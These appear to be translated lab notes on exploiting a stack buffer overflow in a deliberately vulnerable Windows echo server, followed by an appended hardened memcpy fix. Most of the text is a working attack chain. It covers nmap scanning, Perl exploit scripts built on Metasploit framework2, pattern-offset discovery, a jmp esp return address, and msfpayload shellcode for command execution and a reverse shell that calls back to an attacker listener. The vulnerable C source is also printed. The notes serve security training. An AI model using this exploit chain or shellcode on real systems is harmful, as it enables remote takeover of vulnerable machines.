## Malicious-code logic using address values
After checking the size of the region that holds the local variables and filling all of it, the slot where the return value goes
1. Port scan - nmap
2. Session - nc
3. Attack - perl
\\\\\\\\\\\\\
1. Port scan
# nmap -sS -f <XP's IP> -p 6000-7000 (out of some 65355 ports in total)
XP: 150, Linux: 100 (last octet of each IP)
2. Session
NC = netcat
# nc <XP's IP> 6235
root@bt:~# nc 192.168.17.150 6235
Hello
server : hi, Client
Hello
09_vuln_server stores the string and then sends it back.
func(char *str){
char buf[4];
memcpy(buf,str,1024);
}
.c C
.c c++
.pl perl
\\\\\\\\\\\\\\\\\\\\\\\\\\\ BackTrack
# attack.pl
use lib "/pentest/exploits/framework2/lib";
use Msf::Socket::Tcp;
$conn=Msf::Socket::Tcp->new(
'PeerAddr' => '192.168.17.150',
'PeerPort' => '6235',
);
if($conn->IsError){
print "error:" . $conn->GetError . "\n";
}
$dummy = "A" x 3000;
$conn->Send($dummy . "\r\n");
# run
root@bt:~/test# perl attack.pl
\\\\\\\\\\\\\\\\\\\\\\\\\\\ Windows
An error occurs with offset: 41414141
The offset is an address
----------------
[Computing] The distance between some address and another address located at a gap from it. When memory is divided into pages or segments, it denotes the position that lies that many bytes away from a given start address.
----------------
This situation arose because the return address was overwritten.
If you send abc ... yz A1 A2 A3 ... AA1 AA2 instead, you can see at which position it lands.
################ Linux code
use lib "/pentest/exploits/framework2/lib";
use Msf::Socket::Tcp;
use Pex::Text;
$conn=Msf::Socket::Tcp->new(
'PeerAddr' => '192.168.17.150',
'PeerPort' => '6235',
);
if($conn->IsError){
print "error:" . $conn->GetError . "\n";
}
$Pattern = Pex::Text::PatternCreate(3000); # <-- 3000-byte pattern
$dummy = "A" x 3000;
$conn->Send($Pattern . "\r\n");
\\\\\\\\\\\\\\\\ Windows error
AppName: 09_vuln_server.exe AppVer: 0.0.0.0 ModName: unknown
ModVer: 0.0.0.0 Offset: 37714136 <- return address
\\\\\\\\\\\\\\\\\ Check the files on Linux
root@bt:~# cd /pentest/exploits/framework2/sdk/
root@bt:/pentest/exploits/framework2/sdk# pwd
/pentest/exploits/framework2/sdk
root@bt:/pentest/exploits/framework2/sdk# ll
total 24
drwxr-xr-x 3 root root 4096 2011-05-10 03:41 ./
drwxr-xr-x 14 root root 4096 2011-05-10 03:41 ../
drwxr-xr-x 2 root root 4096 2011-05-10 03:41 docs/
-rwxr-xr-x 1 root root 739 2011-05-05 10:18 formatGen.pl*
-rwxr-xr-x 1 root root 260 2011-05-05 10:18 patternOffset.pl*
-rwxr-xr-x 1 root root 417 2011-05-05 10:18 spitCode.pl*
root@bt:/pentest/exploits/framework2/sdk# vi patternOffset.pl
root@bt:/pentest/exploits/framework2/sdk# ./patternOffset.pl 37714136 3000
500 <-- located at position 500
~ previous function's stack -> attack
RET    jmp esp
SFP  --┐ these 500 bytes are junk filler
locals -┘
use lib "/pentest/exploits/framework2/lib";
use Msf::Socket::Tcp;
use Pex::Text;
$conn=Msf::Socket::Tcp->new(
'PeerAddr' => '192.168.17.150',
'PeerPort' => '6235',
);
if($conn->IsError){
print "error:" . $conn->GetError . "\n";
}
$jmpesp = "\xED\x1E\x97\x7C";
$Pattern = Pex::Text::PatternCreate(3000);
$dummy = "A" x 3000;
$conn->Send($Pattern . $jmpesp . "\r\n");
\\\\\\\\\\\ On Windows, press E (in the debugger) to go into kernel32, and a jmp esp shows up
7C971EED ? FFE4 JMP ESP
\\\\\\\\\ Linux
root@bt:/pentest/exploits/framework2# ls
data exploits msfcli msfelfscan msfpayload msfweb sdk tools
docs extras msfconsole msfencode msfpescan nops src
encoders lib msfdldebug msflogdump msfupdate payloads t
root@bt:/pentest/exploits/framework2# ./msfpayload
root@bt:/pentest/exploits/framework2# ./msfpayload win32_exec
It explains how to build the payload.
Name: Windows Execute Command
Version: $Revision: 1669 $
OS/CPU: win32/x86
Needs Admin: No
Multistage: No
Total Size: 130
Keys: noconn
Provided By:
vlad902 <vlad902 [at] gmail.com>
Available Options:
Options: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required CMD The command string to execute <-- (note this one)
Just write any string that can be executed.
Advanced Options:
Advanced (Msf::Payload::win32_exec):
------------------------------------
Description:
Execute an arbitrary command
root@bt:/pentest/exploits/framework2# ./msfpayload win32_exec CMD="calc.exe"
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99"
"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04"
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb"
"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30"
"\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09"
"\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8"
"\x83\xc0\x7b\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff"
"\xe7\x00"; // the \x00 has to be removed, so it must be built by hand
root@bt:/pentest/exploits/framework2# ./msfpayload
win32_reverse
###
From XP, attach to Linux with telnet
From Linux, go over with telnet
root@bt:/pentest/exploits/framework2# ./msfpayload win32_reverse
Name: Windows Reverse Shell
Version: $Revision: 2067 $
OS/CPU: win32/x86
Needs Admin: No
Multistage: No
Total Size: 287
Keys: reverse
Provided By:
vlad902 <vlad902 [at] gmail.com>
Available Options:
Options: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Advanced Options:
Advanced (Msf::Payload::win32_reverse):
---------------------------------------
Description:
Connect back to attacker and spawn a shell
Put in the Linux IP and use P (perl output), and it runs.
root@bt:/pentest/exploits/framework2# ./msfpayload win32_reverse LHOST="192.168.180100" LPORT="4321" P
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68".
"\xff\xff\xff\xff\x66\x68\x10\xe1\x66\x53\x89\xe1\x95\x68\xec\xf9".
"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68".
"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3".
"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab".
"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51".
"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6".
"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6".
"\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";
## Open the port
root@bt:~/test# nc -lvp 4321
listening on [any] 4321 ...
# Windows
start www.naver.com
start notepad
==============================
Problem 2: ports 1000~2000
root@bt:~/test# nmap -sS -f 192.168.17.150 -p 1000-2000
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2013-04-29 22:49 EDT
Nmap scan report for 192.168.17.150
Host is up (0.00057s latency).
Not shown: 1000 filtered ports
PORT STATE SERVICE
1472/tcp open csdm
MAC Address: 00:0C:29:68:99:56 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 20.06 seconds
1472
func(char *str){
char buf[496]; // 500 - 4 (return)
memcpy(buf,str,1024);
}
\\\\\\\\\\\\\\ Analysis of #9
The 500 - 4 = 496 bytes of space must not be filled up.
Functions: memcpy, strcpy
String: hi,client
mov byte [EDX+500], 0;
Original source
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#define SS_OK 0
/* buf is 500 bytes, but the copy length is strlen(str), i.e. whatever the client sent */
void pr(char *str)
{
char buf[500]="";
memcpy(buf,str,strlen(str));
printf("%s\n",buf);
}
void sError(char *str)
{
printf("Error %s", str);
WSACleanup();
}
500 bytes -- there is no SFP (frame pointer omission)
1F4 (= 500 in hex)
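The defect in pr() above is that the copy length comes from the peer's string rather than from the size of buf, so a 3000-byte "A" string runs past the 500-byte buffer into the saved return address. The following is an added example, not code from the page or from 09_vuln_server: a hypothetical hardened replacement pr_safe() that bounds the copy to the destination size, always NUL-terminates, and reports when an input had to be truncated (which is also the condition a server should log as a suspicious over-long message). BUF_SIZE, pr_safe and demo_overlong_input are names chosen here; the 3000-byte input is constructed to match the payload length used in the notes.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Same buffer size as the original pr() */
#define BUF_SIZE 500

/* Hypothetical hardened replacement for pr(): copies at most dstlen-1 bytes
 * from src into dst and always NUL-terminates dst.
 * Returns 1 if src had to be truncated (i.e. it would have overrun dst),
 * 0 if it fit, -1 if dst cannot hold anything. */
int pr_safe(char *dst, size_t dstlen, const char *src)
{
    size_t len;
    int truncated = 0;

    if (dst == NULL || src == NULL || dstlen == 0)
        return -1;

    len = strlen(src);
    if (len >= dstlen) {        /* would not fit: clamp to what fits */
        len = dstlen - 1;
        truncated = 1;
    }
    memcpy(dst, src, len);      /* length now bounded by the destination */
    dst[len] = '\0';
    return truncated;
}

/* Feeds a constructed 3000-byte 'A' string (the length used in the notes)
 * into a BUF_SIZE buffer through pr_safe(). Returns 1 when the input was
 * truncated and the buffer holds exactly BUF_SIZE-1 characters, i.e. nothing
 * was written past the end of buf. */
int demo_overlong_input(void)
{
    static char input[3001];    /* constructed sample input, not real traffic */
    char buf[BUF_SIZE];
    int truncated;

    memset(input, 'A', 3000);
    input[3000] = '\0';

    truncated = pr_safe(buf, sizeof buf, input);
    return truncated == 1 && strlen(buf) == BUF_SIZE - 1;
}

int main(void)
{
    char small[8];

    printf("over-long input truncated safely: %d\n", demo_overlong_input());
    /* A short message fits and is returned unchanged */
    pr_safe(small, sizeof small, "hi");
    printf("short message: %s\n", small);
    return 0;
}
```

The point of the check is that the bound is taken from sizeof(buf), which the server controls, instead of strlen(str), which the client controls; a server that wants to keep the echo behaviour can still reply with the truncated string, and the return value gives it a cheap signal to log over-long requests.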